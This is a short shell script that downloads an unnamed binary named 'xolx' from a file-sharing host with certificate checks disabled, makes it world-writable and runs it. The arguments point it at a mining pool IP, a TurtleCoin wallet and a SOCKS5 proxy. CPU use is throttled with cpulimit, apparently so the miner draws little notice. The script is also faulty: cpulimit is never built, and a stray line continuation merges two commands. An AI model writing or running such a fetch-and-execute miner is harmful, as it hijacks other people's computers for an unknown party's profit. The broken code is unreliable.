#!/bin/sh

wget --no-check-certificate -c https://github.com/opsengine/cpulimit/archive/v${CPULIMIT_VERSION}.tar.gz 
tar zxvf v${CPULIMIT_VERSION}.tar.gz 
cd cpulimit-${CPULIMIT_VERSION} 
wget --no-check-certificate -c http://transfer.sh/fxqKQz/xolx -O xolx \
chmod 777 xolx
cpulimit -l ${CPU_USAGE} -e xolx &
./xolx -o 131.153.142.106:80 -u TRTLv2xgnXYJBqb7BuX2MwFZg42hfNDxrK9Y7kjZBNHuZRM17sJSEvQQK8BDhb3Nra48dvXydwZEjA7gWKNwLRJpE7Rw4DXjQqJ.0000000000000000000000000000000000000000000000000000001884336411 -p XMR-NODE-PROXY --donate-level 1 -x socks5://72.206.181.105:64935 -k -t 6